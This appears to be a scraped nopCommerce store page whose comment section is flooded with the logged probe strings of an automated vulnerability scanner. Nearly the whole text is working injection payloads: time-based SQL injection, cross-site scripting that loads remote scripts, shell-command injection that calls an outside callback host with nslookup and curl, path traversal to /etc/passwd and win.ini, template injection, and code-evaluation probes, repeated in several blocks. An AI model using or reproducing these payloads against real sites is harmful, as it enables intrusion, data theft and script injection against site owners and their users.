nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
555
1HZK4VngAO
response.write(9641444*9921671)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9641444*9921671)+'
"+response.write(9641444*9921671)+"
<% response.write(9641444*9921671) %>
+response.write(9641444*9921671)'
echo bynfuf$()\ mbeqhs\nz^xyu||a #' &echo bynfuf$()\ mbeqhs\nz^xyu||a #|" &echo bynfuf$()\ mbeqhs\nz^xyu||a #
&echo kxzvwb$()\ pfzfhz\nz^xyu||a #' &echo kxzvwb$()\ pfzfhz\nz^xyu||a #|" &echo kxzvwb$()\ pfzfhz\nz^xyu||a #
555&echo fkdfmz$()\ rivcdy\nz^xyu||a #' &echo fkdfmz$()\ rivcdy\nz^xyu||a #|" &echo fkdfmz$()\ rivcdy\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
|echo chdgme$()\ gnnujk\nz^xyu||a #' |echo chdgme$()\ gnnujk\nz^xyu||a #|" |echo chdgme$()\ gnnujk\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
555|echo kbjynr$()\ voalfn\nz^xyu||a #' |echo kbjynr$()\ voalfn\nz^xyu||a #|" |echo kbjynr$()\ voalfn\nz^xyu||a #
file:///etc/passwd
(nslookup -q=cname hitnpgjmjzsxf063a9.bxss.me||curl hitnpgjmjzsxf063a9.bxss.me))
$(nslookup -q=cname hitgpdvtuhoux640cb.bxss.me||curl hitgpdvtuhoux640cb.bxss.me)
../555
&nslookup -q=cname hitocbqtrhcylcfe59.bxss.me&'\"`0&nslookup -q=cname hitocbqtrhcylcfe59.bxss.me&`'
&(nslookup -q=cname hittdfxwjhhnh8906e.bxss.me||curl hittdfxwjhhnh8906e.bxss.me)&'\"`0&(nslookup -q=cname hittdfxwjhhnh8906e.bxss.me||curl hittdfxwjhhnh8906e.bxss.me)&`'
|(nslookup -q=cname hitddjbqiqesv438fb.bxss.me||curl hitddjbqiqesv438fb.bxss.me)
`(nslookup -q=cname hitkvgisltlll9e128.bxss.me||curl hitkvgisltlll9e128.bxss.me)`
;(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)|(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)&(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitzlnauqhiiea2b86.bxss.me||curl${IFS}hitzlnauqhiiea2b86.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpfftryttwz10516.bxss.me||curl${IFS}hitpfftryttwz10516.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpfftryttwz10516.bxss.me||curl${IFS}hitpfftryttwz10516.bxss.me)&`'
555<esi:include src="http://bxss.me/rpb.png"/>
${9999894+9999009}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
)
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
'"()
555'&&sleep(27*1000)*azcugc&&'
555"&&sleep(27*1000)*dqfdkh&&"
555'||sleep(27*1000)*uvtpft||'
555"||sleep(27*1000)*lejzqd||"
'.gethostbyname(lc('hitpv'.'aleirokn29975.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(70).chr(117).chr(80).'
".gethostbyname(lc("hitah"."stfkutss848e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(65).chr(114).chr(77)."
gethostbyname(lc('hitrd'.'pahpclcod9b88.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(82).chr(104).chr(83)
-1 OR 2+469-469-1=0+0+0+1 --
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1 OR 2+895-895-1=0+0+0+1
';print(md5(31337));$a='
";print(md5(31337));$a="
-1' OR 2+862-862-1=0+0+0+1 --
${@print(md5(31337))}
-1' OR 2+188-188-1=0+0+0+1 or 'TtV8EltU'='
${@print(md5(31337))}\
-1" OR 2+851-851-1=0+0+0+1 --
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(107).concat(84).concat(116).concat(87)+(require"socket"Socket.gethostbyname("hitzi"+"ktecdcuxfa0a7.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(114).concat(84).concat(106).concat(85)+(require'socket'Socket.gethostbyname('hitfr'+'pmojibcj30356.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(73).concat(118).concat(90)+(require'socket'Socket.gethostbyname('hitew'+'hcjsuqpr3502f.bxss.me.')[3].to_s)
nopcommerce-new-release
nopcommerce-new-release/.
xfs.bxss.me
'"
<!--
555'"()&%<zzz><ScRiPt >EFhU(9550)</ScRiPt>
'"()&%<zzz><ScRiPt >EFhU(9790)</ScRiPt>
5559915809
555*if(now()=sysdate(),sleep(15),0)
bfg5493<s1﹥s2ʺs3ʹhjl5493
bfgx5772%C0%BEz1%C0%BCz2a%90bcxhjl5772
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >EFhU(9633)</ScRiPt>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555<WRI3H4>RXMHM[!+!]</WRI3H4>
555<script>EFhU(9790)</script>
555<script>EFhU(9266)</script>9266
555<ScR<ScRiPt>IpT>EFhU(9659)</sCr<ScRiPt>IpT>
555<ScRiPt >EFhU(9151)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9995></ScRiPt>
555<isindex type=image src=1 onerror=EFhU(9415)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9252'>
555<body onload=EFhU(9542)>
555<img src=//xss.bxss.me/t/dot.gif onload=EFhU(9986)>
555<img src=xyz OnErRor=EFhU(9127)>
555<img/src=">" onerror=alert(9987)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%45%46%68%55%289634%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\EFhU(9345)\u003C/sCripT\u003E
555<ScRiPt>EFhU(9897)</sCripT>
%F6<img zzz onmouseover=EFhU(98471) //%F6>
555<input autofocus onfocus=EFhU(9427)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(EFhU(9597))}
555oVNq3<ScRiPt >EFhU(9815)</ScRiPt>
555<WCM732>K2BQQ[!+!]</WCM732>
555<ifRAme sRc=9617.com></IfRamE>
555<axOh0Tw x=9980>
555<img sRc='http://attacker-9431/log.php?
555<aqoFtnx<
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
5558xV3FKxl'; waitfor delay '0:0:15' --
555QqqkPdc2'); waitfor delay '0:0:15' --
555rPeOeSAQ')); waitfor delay '0:0:15' --
555-1 OR 298=(SELECT 298 FROM PG_SLEEP(15))--
555-1) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
555-1)) OR 325=(SELECT 325 FROM PG_SLEEP(15))--
555Jf3iQAca' OR 933=(SELECT 933 FROM PG_SLEEP(15))--
555zbuAHOfn') OR 919=(SELECT 919 FROM PG_SLEEP(15))--
555ehsR2BzQ')) OR 152=(SELECT 152 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@QSXvS
response.write(9122386*9899339)
'+response.write(9122386*9899339)+'
"+response.write(9122386*9899339)+"
<% response.write(9122386*9899339) %>
+response.write(9122386*9899339)'
echo yovbzr$()\ whdwnm\nz^xyu||a #' &echo yovbzr$()\ whdwnm\nz^xyu||a #|" &echo yovbzr$()\ whdwnm\nz^xyu||a #
&echo embapl$()\ cisjfi\nz^xyu||a #' &echo embapl$()\ cisjfi\nz^xyu||a #|" &echo embapl$()\ cisjfi\nz^xyu||a #
555&echo ccwbco$()\ aqluxp\nz^xyu||a #' &echo ccwbco$()\ aqluxp\nz^xyu||a #|" &echo ccwbco$()\ aqluxp\nz^xyu||a #
|echo hmxofd$()\ kazxvi\nz^xyu||a #' |echo hmxofd$()\ kazxvi\nz^xyu||a #|" |echo hmxofd$()\ kazxvi\nz^xyu||a #
555|echo gdsibq$()\ rsusej\nz^xyu||a #' |echo gdsibq$()\ rsusej\nz^xyu||a #|" |echo gdsibq$()\ rsusej\nz^xyu||a #
(nslookup -q=cname hitjoprtzvhid28d6a.bxss.me||curl hitjoprtzvhid28d6a.bxss.me))
$(nslookup -q=cname hitvbhovnipia1bae9.bxss.me||curl hitvbhovnipia1bae9.bxss.me)
&nslookup -q=cname hitcrgqjyigvyf67b2.bxss.me&'\"`0&nslookup -q=cname hitcrgqjyigvyf67b2.bxss.me&`'
&(nslookup -q=cname hitniyaycapjl4b3fb.bxss.me||curl hitniyaycapjl4b3fb.bxss.me)&'\"`0&(nslookup -q=cname hitniyaycapjl4b3fb.bxss.me||curl hitniyaycapjl4b3fb.bxss.me)&`'
|(nslookup -q=cname hitaqdfniotvi6e188.bxss.me||curl hitaqdfniotvi6e188.bxss.me)
`(nslookup -q=cname hitpudiauqadq9b71a.bxss.me||curl hitpudiauqadq9b71a.bxss.me)`
;(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)|(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)&(nslookup -q=cname hitjqsaoxxalzf8e8f.bxss.me||curl hitjqsaoxxalzf8e8f.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitxpiazqrtgg6d658.bxss.me||curl${IFS}hitxpiazqrtgg6d658.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitmubpfflvud074c3.bxss.me||curl${IFS}hitmubpfflvud074c3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmubpfflvud074c3.bxss.me||curl${IFS}hitmubpfflvud074c3.bxss.me)&`'
-1 OR 2+455-455-1=0+0+0+1 --
-1 OR 2+110-110-1=0+0+0+1
-1' OR 2+788-788-1=0+0+0+1 --
-1' OR 2+110-110-1=0+0+0+1 or 'axFwG3L0'='
-1" OR 2+567-567-1=0+0+0+1 --
${10000458+9999013}
555'&&sleep(27*1000)*illhyf&&'
555"&&sleep(27*1000)*myzgvd&&"
555'||sleep(27*1000)*whvhnt||'
555"||sleep(27*1000)*bhqmop||"
'.gethostbyname(lc('hitna'.'xykdhjpo67bcd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(78).chr(120).chr(80).'
".gethostbyname(lc("hityb"."sdmsuxsj6ce47.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(110).chr(84)."
gethostbyname(lc('hitcq'.'ahdwjrdn5348e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(81).chr(103).chr(69)
"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(119).concat(84)+(require"socket"Socket.gethostbyname("hitwh"+"kdntubwaac75f.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(100).concat(90).concat(100).concat(73)+(require'socket'Socket.gethostbyname('hitba'+'ympuvueoca387.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(101).concat(72).concat(110).concat(87)+(require'socket'Socket.gethostbyname('hitny'+'ibpyjslybcef2.bxss.me.')[3].to_s)
555'"()&%<zzz><ScRiPt >oLqV(9728)</ScRiPt>
'"()&%<zzz><ScRiPt >oLqV(9225)</ScRiPt>
5559386309
555'"()&%<zzz><ScRiPt >lXxK(9622)</ScRiPt>
'"()&%<zzz><ScRiPt >lXxK(9243)</ScRiPt>
bfg6685<s1﹥s2ʺs3ʹhjl6685
5559746054
bfgx10013%C0%BEz1%C0%BCz2a%90bcxhjl10013
555<ScRiPt >oLqV(9518)</ScRiPt>
555<WO2X0A>UEYVU[!+!]</WO2X0A>
555<script>oLqV(9299)</script>
555<script>oLqV(9314)</script>9314
555<ScR<ScRiPt>IpT>oLqV(9203)</sCr<ScRiPt>IpT>
555<ScRiPt >oLqV(9472)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9478></ScRiPt>
555<isindex type=image src=1 onerror=oLqV(9800)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9523'>
555<body onload=oLqV(9233)>
555<img src=//xss.bxss.me/t/dot.gif onload=oLqV(9073)>
555<img src=xyz OnErRor=oLqV(9853)>
555<img/src=">" onerror=alert(9035)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4C%71%56%289551%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\oLqV(9216)\u003C/sCripT\u003E
555<ScRiPt>oLqV(9870)</sCripT>
%F6<img zzz onmouseover=oLqV(91281) //%F6>
555<input autofocus onfocus=oLqV(9539)>
555}body{zzz:Expre/**/SSion(oLqV(9018))}
5551OdLv<ScRiPt >oLqV(9315)</ScRiPt>
555<WRQ3UY>SR5W3[!+!]</WRQ3UY>
555<ifRAme sRc=9019.com></IfRamE>
555<ahXPB9y x=9355>
555<img sRc='http://attacker-9312/log.php?
555<adnBd86<
555b3yytIUr'; waitfor delay '0:0:15' --
5553qy6a7rG'); waitfor delay '0:0:15' --
555gD4oyQf2')); waitfor delay '0:0:15' --
555-1 OR 796=(SELECT 796 FROM PG_SLEEP(15))--
555-1) OR 655=(SELECT 655 FROM PG_SLEEP(15))--
555-1)) OR 552=(SELECT 552 FROM PG_SLEEP(15))--
555Sz10nhAQ' OR 635=(SELECT 635 FROM PG_SLEEP(15))--
555CdhBzzdl') OR 213=(SELECT 213 FROM PG_SLEEP(15))--
555b43AuSBO')) OR 695=(SELECT 695 FROM PG_SLEEP(15))--
@@OXhLZ
555'"()&%<zzz><ScRiPt >6Od7(9334)</ScRiPt>
'"()&%<zzz><ScRiPt >6Od7(9293)</ScRiPt>
response.write(9608958*9576242)
5559780420
'+response.write(9608958*9576242)+'
"+response.write(9608958*9576242)+"
<% response.write(9608958*9576242) %>
+response.write(9608958*9576242)'
echo bgtotu$()\ ggnvvb\nz^xyu||a #' &echo bgtotu$()\ ggnvvb\nz^xyu||a #|" &echo bgtotu$()\ ggnvvb\nz^xyu||a #
&echo vbcvej$()\ yadrrg\nz^xyu||a #' &echo vbcvej$()\ yadrrg\nz^xyu||a #|" &echo vbcvej$()\ yadrrg\nz^xyu||a #
555&echo xpydtc$()\ rpcmpk\nz^xyu||a #' &echo xpydtc$()\ rpcmpk\nz^xyu||a #|" &echo xpydtc$()\ rpcmpk\nz^xyu||a #
|echo xxkzpp$()\ ijkips\nz^xyu||a #' |echo xxkzpp$()\ ijkips\nz^xyu||a #|" |echo xxkzpp$()\ ijkips\nz^xyu||a #
${10000060+9999606}
555|echo cbvdbi$()\ wvuvtt\nz^xyu||a #' |echo cbvdbi$()\ wvuvtt\nz^xyu||a #|" |echo cbvdbi$()\ wvuvtt\nz^xyu||a #
(nslookup -q=cname hitpqmmfikzjo97163.bxss.me||curl hitpqmmfikzjo97163.bxss.me))
$(nslookup -q=cname hitlrirmfdqyje75b6.bxss.me||curl hitlrirmfdqyje75b6.bxss.me)
&nslookup -q=cname hitftpxhwmnys2112e.bxss.me&'\"`0&nslookup -q=cname hitftpxhwmnys2112e.bxss.me&`'
&(nslookup -q=cname hitwujempizwcc7b8f.bxss.me||curl hitwujempizwcc7b8f.bxss.me)&'\"`0&(nslookup -q=cname hitwujempizwcc7b8f.bxss.me||curl hitwujempizwcc7b8f.bxss.me)&`'
|(nslookup -q=cname hitlehyaapoof891f9.bxss.me||curl hitlehyaapoof891f9.bxss.me)
`(nslookup -q=cname hitaiksznvgws65fd4.bxss.me||curl hitaiksznvgws65fd4.bxss.me)`
;(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)|(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)&(nslookup -q=cname hitsefvakgotme13ca.bxss.me||curl hitsefvakgotme13ca.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjshgwghpsb7491b.bxss.me||curl${IFS}hitjshgwghpsb7491b.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitnttqjlvsatac5fa.bxss.me||curl${IFS}hitnttqjlvsatac5fa.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnttqjlvsatac5fa.bxss.me||curl${IFS}hitnttqjlvsatac5fa.bxss.me)&`'
'.gethostbyname(lc('hitlw'.'dawgrmdwcc05a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(68).chr(110).chr(79).'
".gethostbyname(lc("hitlz"."ocbtkfxo287cb.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(90).chr(101).chr(86)."
gethostbyname(lc('hitqa'.'lttjrcimd545c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(108).chr(73)
555'&&sleep(27*1000)*inuspo&&'
555"&&sleep(27*1000)*alpoyx&&"
555'||sleep(27*1000)*fsfxwg||'
555"||sleep(27*1000)*uueetz||"
"+"A".concat(70-3).concat(22*4).concat(116).concat(74).concat(117).concat(76)+(require"socket"Socket.gethostbyname("hitxx"+"hnmxvhnm10da2.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(121).concat(82).concat(118).concat(86)+(require'socket'Socket.gethostbyname('hitdb'+'gbghrxli9a727.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(115).concat(78).concat(109).concat(73)+(require'socket'Socket.gethostbyname('hitwr'+'taxjswpg39dd9.bxss.me.')[3].to_s)
-1 OR 2+123-123-1=0+0+0+1 --
-1 OR 2+938-938-1=0+0+0+1
-1' OR 2+846-846-1=0+0+0+1 --
-1' OR 2+826-826-1=0+0+0+1 or 'YNNByTFv'='
-1" OR 2+313-313-1=0+0+0+1 --
555'"()&%<zzz><ScRiPt >pPU7(9097)</ScRiPt>
'"()&%<zzz><ScRiPt >pPU7(9166)</ScRiPt>
5559062335
bfg5407<s1﹥s2ʺs3ʹhjl5407
bfgx2878%C0%BEz1%C0%BCz2a%90bcxhjl2878
555<ScRiPt >pPU7(9513)</ScRiPt>
555<W3ITKS>O9ELX[!+!]</W3ITKS>
555<script>pPU7(9874)</script>
555<script>pPU7(9201)</script>9201
555<ScR<ScRiPt>IpT>pPU7(9367)</sCr<ScRiPt>IpT>
555<ScRiPt >pPU7(9702)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9776></ScRiPt>
555<isindex type=image src=1 onerror=pPU7(9980)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9038'>
555<body onload=pPU7(9712)>
555<img src=//xss.bxss.me/t/dot.gif onload=pPU7(9740)>
555<img src=xyz OnErRor=pPU7(9157)>
555<img/src=">" onerror=alert(9680)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%70%50%55%37%289722%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\pPU7(9834)\u003C/sCripT\u003E
555<ScRiPt>pPU7(9685)</sCripT>
%F6<img zzz onmouseover=pPU7(97541) //%F6>
555<input autofocus onfocus=pPU7(9737)>
555}body{zzz:Expre/**/SSion(pPU7(9024))}
555A1RaY<ScRiPt >pPU7(9099)</ScRiPt>
555<WGA6WZ>XDHYT[!+!]</WGA6WZ>
555<ifRAme sRc=9893.com></IfRamE>
555<a7PcExf x=9094>
555<img sRc='http://attacker-9490/log.php?
555<aAgACSI<
5552Vu4wMIn'; waitfor delay '0:0:15' --
555yf7cLXUC'); waitfor delay '0:0:15' --
5559VrmsVwF')); waitfor delay '0:0:15' --
555-1 OR 370=(SELECT 370 FROM PG_SLEEP(15))--
555-1) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
555-1)) OR 443=(SELECT 443 FROM PG_SLEEP(15))--
555U6EdD69V' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
555jXL355s4') OR 361=(SELECT 361 FROM PG_SLEEP(15))--
555RNsOWtLx')) OR 696=(SELECT 696 FROM PG_SLEEP(15))--
@@BHthC
555'"()&%<zzz><ScRiPt >nK6Y(9700)</ScRiPt>
'"()&%<zzz><ScRiPt >nK6Y(9123)</ScRiPt>
5559686268
bfg10562<s1﹥s2ʺs3ʹhjl10562
bfgx7020%C0%BEz1%C0%BCz2a%90bcxhjl7020
555<ScRiPt >nK6Y(9552)</ScRiPt>
555<WHCYIS>2L9TP[!+!]</WHCYIS>
555<script>nK6Y(9336)</script>
555<script>nK6Y(9243)</script>9243
555<ScR<ScRiPt>IpT>nK6Y(9745)</sCr<ScRiPt>IpT>
555<ScRiPt >nK6Y(9861)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9881></ScRiPt>
555<isindex type=image src=1 onerror=nK6Y(9057)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9274'>
555<body onload=nK6Y(9771)>
555<img src=//xss.bxss.me/t/dot.gif onload=nK6Y(9516)>
555<img src=xyz OnErRor=nK6Y(9756)>
555<img/src=">" onerror=alert(9675)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%4B%36%59%289070%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\nK6Y(9882)\u003C/sCripT\u003E
555<ScRiPt>nK6Y(9150)</sCripT>
%F6<img zzz onmouseover=nK6Y(95991) //%F6>
555<input autofocus onfocus=nK6Y(9491)>
555}body{zzz:Expre/**/SSion(nK6Y(9214))}
555YSKHe<ScRiPt >nK6Y(9077)</ScRiPt>
555<W6U0TK>6DA2G[!+!]</W6U0TK>
555<ifRAme sRc=9197.com></IfRamE>
555<a3ok0iw x=9835>
555<img sRc='http://attacker-9144/log.php?
555<aUHdZAo<
This is a sample comment...
555
1HZK4VngAO
555
response.write(9641444*9921671)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9641444*9921671)+'
555
"+response.write(9641444*9921671)+"
<% response.write(9641444*9921671) %>
+response.write(9641444*9921671)'
555
echo bynfuf$()\ mbeqhs\nz^xyu||a #' &echo bynfuf$()\ mbeqhs\nz^xyu||a #|" &echo bynfuf$()\ mbeqhs\nz^xyu||a #
555
&echo kxzvwb$()\ pfzfhz\nz^xyu||a #' &echo kxzvwb$()\ pfzfhz\nz^xyu||a #|" &echo kxzvwb$()\ pfzfhz\nz^xyu||a #
555
555&echo fkdfmz$()\ rivcdy\nz^xyu||a #' &echo fkdfmz$()\ rivcdy\nz^xyu||a #|" &echo fkdfmz$()\ rivcdy\nz^xyu||a #
555
../../../../../../../../../../../../../../etc/passwd
|echo chdgme$()\ gnnujk\nz^xyu||a #' |echo chdgme$()\ gnnujk\nz^xyu||a #|" |echo chdgme$()\ gnnujk\nz^xyu||a #
555
../../../../../../../../../../../../../../windows/win.ini
555|echo kbjynr$()\ voalfn\nz^xyu||a #' |echo kbjynr$()\ voalfn\nz^xyu||a #|" |echo kbjynr$()\ voalfn\nz^xyu||a #
file:///etc/passwd
(nslookup -q=cname hitnpgjmjzsxf063a9.bxss.me||curl hitnpgjmjzsxf063a9.bxss.me))
555
$(nslookup -q=cname hitgpdvtuhoux640cb.bxss.me||curl hitgpdvtuhoux640cb.bxss.me)
../555
&nslookup -q=cname hitocbqtrhcylcfe59.bxss.me&'\"`0&nslookup -q=cname hitocbqtrhcylcfe59.bxss.me&`'
555
&(nslookup -q=cname hittdfxwjhhnh8906e.bxss.me||curl hittdfxwjhhnh8906e.bxss.me)&'\"`0&(nslookup -q=cname hittdfxwjhhnh8906e.bxss.me||curl hittdfxwjhhnh8906e.bxss.me)&`'
555
|(nslookup -q=cname hitddjbqiqesv438fb.bxss.me||curl hitddjbqiqesv438fb.bxss.me)
555
`(nslookup -q=cname hitkvgisltlll9e128.bxss.me||curl hitkvgisltlll9e128.bxss.me)`
555
;(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)|(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)&(nslookup -q=cname hitnkznmupqjzbf0fa.bxss.me||curl hitnkznmupqjzbf0fa.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitzlnauqhiiea2b86.bxss.me||curl${IFS}hitzlnauqhiiea2b86.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpfftryttwz10516.bxss.me||curl${IFS}hitpfftryttwz10516.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpfftryttwz10516.bxss.me||curl${IFS}hitpfftryttwz10516.bxss.me)&`'
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
${9999894+9999009}
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
)
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
555
555
../../../../../../../../../../../../../../etc/shells
555
c:/windows/win.ini
bxss.me
555
555
555
'"()
555'&&sleep(27*1000)*azcugc&&'
555
555"&&sleep(27*1000)*dqfdkh&&"
555
555'||sleep(27*1000)*uvtpft||'
555
555"||sleep(27*1000)*lejzqd||"
555
'.gethostbyname(lc('hitpv'.'aleirokn29975.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(70).chr(117).chr(80).'
555
".gethostbyname(lc("hitah"."stfkutss848e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(65).chr(114).chr(77)."
555
gethostbyname(lc('hitrd'.'pahpclcod9b88.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(82).chr(104).chr(83)
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+469-469-1=0+0+0+1 --
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1 OR 2+895-895-1=0+0+0+1
';print(md5(31337));$a='
";print(md5(31337));$a="
-1' OR 2+862-862-1=0+0+0+1 --
${@print(md5(31337))}
-1' OR 2+188-188-1=0+0+0+1 or 'TtV8EltU'='
${@print(md5(31337))}\
555
-1" OR 2+851-851-1=0+0+0+1 --
'.print(md5(31337)).'
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(107).concat(84).concat(116).concat(87)+(require"socket"
Socket.gethostbyname("hitzi"+"ktecdcuxfa0a7.bxss.me.")[3].to_s)+"
555
bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(114).concat(84).concat(106).concat(85)+(require'socket'
Socket.gethostbyname('hitfr'+'pmojibcj30356.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(107).concat(73).concat(118).concat(90)+(require'socket'
Socket.gethostbyname('hitew'+'hcjsuqpr3502f.bxss.me.')[3].to_s)
555
555
555
555
555
nopcommerce-new-release
555
nopcommerce-new-release/.
555
xfs.bxss.me
555
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >EFhU(9550)</ScRiPt>
'"()&%<zzz><ScRiPt >EFhU(9790)</ScRiPt>
5559915809
555*if(now()=sysdate(),sleep(15),0)
bfg5493<s1﹥s2ʺs3ʹhjl5493
bfgx5772%C0%BEz1%C0%BCz2a%90bcxhjl5772
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >EFhU(9633)</ScRiPt>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555<WRI3H4>RXMHM[!+!]</WRI3H4>
555<script>EFhU(9790)</script>
555<script>EFhU(9266)</script>9266
555<ScR<ScRiPt>IpT>EFhU(9659)</sCr<ScRiPt>IpT>
555<ScRiPt
>EFhU(9151)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9995></ScRiPt>
555<isindex type=image src=1 onerror=EFhU(9415)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
